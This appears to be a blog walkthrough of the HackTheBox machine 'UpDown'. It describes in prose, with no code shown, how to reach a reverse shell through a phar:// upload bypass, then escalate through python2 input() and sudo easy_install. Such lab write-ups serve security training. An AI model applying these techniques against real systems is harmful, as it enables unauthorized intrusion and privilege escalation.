top of page
Image by Blake Cheek
  • Writer's pictureBeri Contraster

UpDown - HackTheBox Walkthrough



Linux - Medium

Created by AB2

Released on 03 Sep 2022


Welcome Reader, Today we'll hack UpDown from HackTheBox. It's a medium-difficult Linux machine. Let's start with an Nmap scan.


Nmap Scan


It is an Ubuntu machine with just SSH and Web Server running on it. Let's check the web server.



It seems like a tool that checks if the website is up or not. Let's add the domain siteisup.htb to /etc/hosts.



I pointed the tool to itself and enabled the debug mode.



This tool sent a GET request to the given address and showed a response in the debug section. There is not much here let's move to virtual host fuzzing and see if we can discover anything.


Virtual Host Fuzzing


Let's add dev.siteisup.htb to /etc/hosts. The discovered virtual host is 403 forbidden.



Let's do some directory fuzzing on siteisup.htb with gobuster.


Directory Fuzzing


Going to /dev gives a blank page. Let's do some more fuzzing on /dev.



Going over to the /dev/.git lists a git repository we can dump the repository to our attacking machines using by git-dumper.




Let's take a look at the .htaccess file. This is an Apache configuration file responsible for redirecting traffic, blocking users, password-protecting directories, and other administrative functions.



FOOTHOLD

The file is set to deny all the requests that do not include Special-Dev in them. Let's try accessing the dev virtual host by adding this header to our request. Let's use Burp Suit for that.



Proxy -> Proxy settings -> Match and replace rules. By adding the following, burp will this header in all the requests going through it which should allow us to access the dev VHost.



We now have a file uploader where we can upload a file containing a list of hosts to check. Let's take a look at the source code of this application which we dumped earlier.



The source code uses the PHP include() function. This function is risky because it can result in Local File Inclusion or even Remote Code Execution. There's a filter on the inclusion of $_GET['page'], which prevents access to specific directories like /etc and /home. If no page GET parameter is provided, the page will include checker.php. I also took a look at checker.php.



Checker.php file is blacklisting extensions but It's allowing .phar file which is a package format for bundled PHP files and can be just as effective as regular PHP

files for remote code execution.


Let's start by creating a .php file that displays php info.



Let's convert this into a zip file so we can utilize the phar:// PHP wrapper to access the contents of the compressed archive. Specifically, we'll use our phpinfo() payload.



Let's upload the file. We can access the file from /uploads and the file is md5 hahsed which we also saw on source code.



Now we can use the PHP wrapper phar:// to trigger our payload. We can do this by going to the http://dev.siteisup.htb/?

page=phar://uploads/file_md5_hash/info.txt/info which will display the PHP info page.



We achieved Remote Code Execution but there is another hurdle in our way. This page revealed that some PHP functions are disabled including system(), shell_exec(), and more.


I was searching for something that'll help me get through this and found a tool defunc_bypasser, this tool will check every function and give us the functions that are enabled and can be used to get a reverse shell. We'll need to make some changes to the code so It adds the Special-Dev header when sending requests otherwise it'll get 403 forbidden.





The tool suggests that we might be able to execute code using proc_open which is similar to popen. Let's create a reverse shell using this function.



Zip the file the same way and upload it to the web server. We can access the file under /uploads and it'll give us a reverse shell.



I upgraded my shell you can copy the commands and read more about shell upgrades here.


Lateral Movement

I was doing manual enumeration before running automated scripts like Linpeas. I found a file with interesting permissions.



The siteisup_test is an executable program owned by the developer user but ww-data can also execute this file. Let's look at the contents of the file.



This is a python2 program using an input function which is known to be insecure, as it acts similar to the eval() function, which allows for executing code as a string.



Now we have a shell as a developer user. We can copy the private ssh key of the user developer and get a more stable shell. I moved the file to my attacking machines using the Python server you can copy and paste it also.


After logging in as developer use I checked if this user can run anything with root privileges and looks it like this user can run easy_install.



Taking a quick look at GTFOBins I found a way to escalate privileges to root using easy_install. GTFOBins is a curated list of Unix binaries that can be used to bypass local security restrictions in misconfigured systems.



Thanks for reading. If you have any questions please don't hesitate to ask me.

20 views0 comments

Recent Posts

See All

Comments


bottom of page